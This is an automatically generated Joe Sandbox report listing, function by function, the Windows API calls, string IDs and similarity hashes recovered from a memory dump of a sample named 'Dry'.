                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE41EA: _wcslen.LIBCMT ref: 00AE41EF
                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B4CF99
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B4CFE0
                                                                                                                                                                                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B4D047
                                                                                                                                                                                                                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00B4D075
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                    • API String ID: 1227352736-4108050209
                                                                                                                                                                                                                                                                                    • Opcode ID: a4157170ba9f739718cbcdab6c9d2bf659c7e6aff6afc7dc8e109954623495ff
                                                                                                                                                                                                                                                                                    • Instruction ID: af4f873df1d767fe661797a77e9a89d4fc5ad71e29ae145d17c448943149abab
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4157170ba9f739718cbcdab6c9d2bf659c7e6aff6afc7dc8e109954623495ff
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB5110316043009BD724AF28C894B7BBBE8EF55714F040AADF995D32E0DBB4CE49A752
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00B6B903
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE41EA: _wcslen.LIBCMT ref: 00AE41EF
                                                                                                                                                                                                                                                                                    • GetProcessId.KERNEL32(00000000), ref: 00B6B998
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B6B9C7
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                                                                                                                    • String ID: <$@
                                                                                                                                                                                                                                                                                    • API String ID: 146682121-1426351568
                                                                                                                                                                                                                                                                                    • Opcode ID: 58892834bef2fdcd1b844e7331dfebbc8565ad83f88a691a46b9eb0b9691768a
                                                                                                                                                                                                                                                                                    • Instruction ID: b99e465a399b9578a52c9a0189850fae06ff0fae471428aac07408ddd7ffb798
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 58892834bef2fdcd1b844e7331dfebbc8565ad83f88a691a46b9eb0b9691768a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8715875A00255DFCB10EF95C594A9EBBF4FF08310F048499E85AAB392CB79ED85CB90
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00B47B6D
                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00B47BA3
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00B47BB4
                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00B47C36
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                                                                                                                                    • String ID: DllGetClassObject
                                                                                                                                                                                                                                                                                    • API String ID: 753597075-1075368562
                                                                                                                                                                                                                                                                                    • Opcode ID: 4f906c9ad03036e5b4dde6511819ed0b6b4b5250fc28753c481d267a4d39db42
                                                                                                                                                                                                                                                                                    • Instruction ID: 67f03ba3b3d36566946d6e6469d8f79c4e2b009f214634909a9ca692ce910d12
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f906c9ad03036e5b4dde6511819ed0b6b4b5250fc28753c481d267a4d39db42
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A4191B1648204EFDB15DF64D8C4A9A7BF9EF44310F1480E9A909AF206DBB0DE44DBA0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B748D1
                                                                                                                                                                                                                                                                                    • IsMenu.USER32(?), ref: 00B748E6
                                                                                                                                                                                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B7492E
                                                                                                                                                                                                                                                                                    • DrawMenuBar.USER32 ref: 00B74941
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                    • API String ID: 3076010158-4108050209
                                                                                                                                                                                                                                                                                    • Opcode ID: adae94a948b95f4686d09886b0b2fd5d3fafd5b1bd8c32dda9c7f07752c68bda
                                                                                                                                                                                                                                                                                    • Instruction ID: 42951a00ec1d188ea32685ccebab9132bd144ba02429ab6b8468926c1850bec6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: adae94a948b95f4686d09886b0b2fd5d3fafd5b1bd8c32dda9c7f07752c68bda
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8415B75A00209EFDB10CF95D884EABBBF9FF06365F0481A9EA6997250D730ED44CB60
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AEB329: _wcslen.LIBCMT ref: 00AEB333
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B445FD: GetClassNameW.USER32(?,?,000000FF), ref: 00B44620
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00B427B3
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00B427C6
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00B427F6
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE8577: _wcslen.LIBCMT ref: 00AE858A
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                    • API String ID: 2081771294-1403004172
                                                                                                                                                                                                                                                                                    • Opcode ID: f7f8df8533b25b1530c312adc0cb09b88cf837b2f6a983423040220a66a76c2d
                                                                                                                                                                                                                                                                                    • Instruction ID: 523d5b65c1e228c13a46a19689ab165241ab9b6b83d76b306f42cc411468c1bc
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f7f8df8533b25b1530c312adc0cb09b88cf837b2f6a983423040220a66a76c2d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D21F171900104BEDB09ABA4DC8ADFFBBF8DF453A0B504169F425A71E1DF394E0AA660
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00B73A29
                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00B73A30
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00B73A45
                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00B73A4D
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                                                                                                                    • String ID: SysAnimate32
                                                                                                                                                                                                                                                                                    • API String ID: 3529120543-1011021900
                                                                                                                                                                                                                                                                                    • Opcode ID: 49a7cbe833e16a25638f8e46f06ea191c85b1b377ab0dc8ef1c2faa6c574e5e8
                                                                                                                                                                                                                                                                                    • Instruction ID: 89617cb17898cb3b13848ec6cf1aa485667944f04c63f679de5977f4ba4182c9
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49a7cbe833e16a25638f8e46f06ea191c85b1b377ab0dc8ef1c2faa6c574e5e8
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1521CD71600205AFEB108F64DC81EAF37E9EF44B64F109258FAA9920E0C771CD80AB60
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00B0508E,?,?,00B0502E,?,00BA98D8,0000000C,00B05185,?,00000002), ref: 00B050FD
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B05110
                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00B0508E,?,?,00B0502E,?,00BA98D8,0000000C,00B05185,?,00000002,00000000), ref: 00B05133
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                    • Opcode ID: fe89030d2f9f9b5edaa70f96b0a16e7cf60c7eb8c94572b5deaa777518b3240e
                                                                                                                                                                                                                                                                                    • Instruction ID: 7f06700cedf287d63c8ede234e95e6c4d8cec82d3c52a79e0092494d50ee6e17
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe89030d2f9f9b5edaa70f96b0a16e7cf60c7eb8c94572b5deaa777518b3240e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 78F04474901208BBDB115F94DC49BAEBFF8EF44752F4400A8F809B25A0DF745D91CB95
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32 ref: 00B3E785
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00B3E797
                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00B3E7BD
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                    • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                                                                                                                                    • API String ID: 145871493-2590602151
                                                                                                                                                                                                                                                                                    • Opcode ID: 0c1d89a7004ffbb42ca4e6445214465c958f5db08b59331fc0722cdc79bf1efa
                                                                                                                                                                                                                                                                                    • Instruction ID: 3696dc139a592004eeac73ad46e58cf6c83a9edc0f1dd1dc888d120d99dcd00b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c1d89a7004ffbb42ca4e6445214465c958f5db08b59331fc0722cdc79bf1efa
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38E0E5719056149FE73157208C84FA932B4AF21741F2401EAF915F35A0DF30CC80C654
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00B25657,?,?,00AE62FA,?,00000001,?,?,00000000), ref: 00AE6610
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00AE6622
                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00B25657,?,?,00AE62FA,?,00000001,?,?,00000000), ref: 00AE6635
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                    • API String ID: 145871493-1355242751
                                                                                                                                                                                                                                                                                    • Opcode ID: 17268e0dd6d0045275875b41feb08f69125c102c635151044a59c0613abbc3a9
                                                                                                                                                                                                                                                                                    • Instruction ID: a7d0786f5a2248fb239a22c097dda7aa5cac6d54fa06cee9a3a708f9db2ff5f7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 17268e0dd6d0045275875b41feb08f69125c102c635151044a59c0613abbc3a9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E9D012356665B157462627366C18B8E6B649EE2BD13450455B808B3524CF60CD41C598
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B535C4
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00B53646
                                                                                                                                                                                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B5365C
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B5366D
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B5367F
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$Delete$Copy
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3226157194-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 111bd68d1d1ee4b408c8af522e1d4f6f97cf6f3d6e7597a7eba080fbbffad79d
                                                                                                                                                                                                                                                                                    • Instruction ID: 4c7dffb6b02a224bdcfffbe3b2c19c69cdff7aea1a240ea76b9e0bc6f5ba054b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 111bd68d1d1ee4b408c8af522e1d4f6f97cf6f3d6e7597a7eba080fbbffad79d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80B14C72900119ABDF15DBA4CC85FDEBBFDEF49751F0040E6F909A6281EA309A488F60
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00B6AE87
                                                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00B6AE95
                                                                                                                                                                                                                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00B6AEC8
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00B6B09D
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3488606520-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 0cb40ed20f3b284bb95e31bb14354a5ec6782213360295ba5e9a14b4327dd2ed
                                                                                                                                                                                                                                                                                    • Instruction ID: 5e7fab1eee39216d3b58641814a0c7ed9854d914ffd2ad1db5b90a03139cbce6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0cb40ed20f3b284bb95e31bb14354a5ec6782213360295ba5e9a14b4327dd2ed
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4EA1BD71A04301AFE720DF25C986F2AB7E5EF44710F14885DF5A9DB292CB75EC418B82
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AEB329: _wcslen.LIBCMT ref: 00AEB333
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B6D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B6C10E,?,?), ref: 00B6D415
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B6D3F8: _wcslen.LIBCMT ref: 00B6D451
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B6D3F8: _wcslen.LIBCMT ref: 00B6D4C8
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B6D3F8: _wcslen.LIBCMT ref: 00B6D4FE
                                                                                                                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B6C505
                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B6C560
                                                                                                                                                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00B6C5C3
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 00B6C606
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00B6C613
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
